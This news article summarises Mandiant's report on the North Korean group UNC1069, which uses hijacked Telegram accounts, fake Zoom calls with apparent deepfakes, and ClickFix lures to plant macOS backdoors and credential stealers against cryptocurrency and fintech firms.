A North Korean hacking campaign is targeting financial technology and cryptocurrency firms with attacks which combine social engineering, deepfakes and MacOS malware.
The attacks have been detailed by Google Cloud’s Mandiant Threat Intelligence, which has attributed the campaign to UNC1069, a financially motivated threat group working out of North Korea. The end goal of the attacks is to steal cryptocurrency.
Researchers identified one campaign which began with a hijacked Telegram profile of a cryptocurrency executive. The individual had previously had their account compromised.
This account was used to send messages to others in the fintech sector to build up trust and rapport. The attacker then sent a calendar invite to join a meeting.
This meeting was designed to look like Zoom but was in fact hosted on infrastructure built by the attacker. According to Mandiant, one target said that after they joined the call, they were faced with a deepfake of the cryptocurrency executive.
While researchers have not been able to verify this, they noted AI-assisted social engineering scams are a known issue.
After joining the meeting, the attacker claimed that the victim was having audio issues and offered a solution to help.
However, this ruse was a ClickFix attack, a technique used by attackers, often accompanied by claims of a technical issue, to trick victims to running commands on their machine which will secretly provide the attackers with access and the ability to run code.
With the access, the attackers could drop malicious files onto the device, which they did in the form of Waveshaper and Hypercall, two backdoors which allowed attackers to gain further control.
Then they installed information stealer malware and a data miner – Deepbreath and CHROMEPUSH – to gain further control and persistence over the machine.
This included the ability to steal credentials from the user’s Keychain, browser data from Chrome, Brave and Edge, user data from two different versions of Telegram and user data from Apple Notes.
Ultimately, all the login credentials and passwords an attacker might need to gain access to the victims’ accounts could be obtained, either to steal from them or use these accounts for additional social engineering.
“The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data and session tokens to facilitate financial theft,” said Mandiant.
“This incident was a targeted attack to harvest as much data as possible for a dual purpose; enabling cryptocurrency theft and fuelling future social engineering campaigns by leveraging victim’s identity and data,” the company added.
State-backed North Korean threat groups have a history of significant cryptocurrency heists and attacks which target organizations in financial technology.
In 2025 alone, North Korea made over $2bn from attacks targeting cryptocurrency and accounts for over 60% of all cryptocurrency stolen during last year.
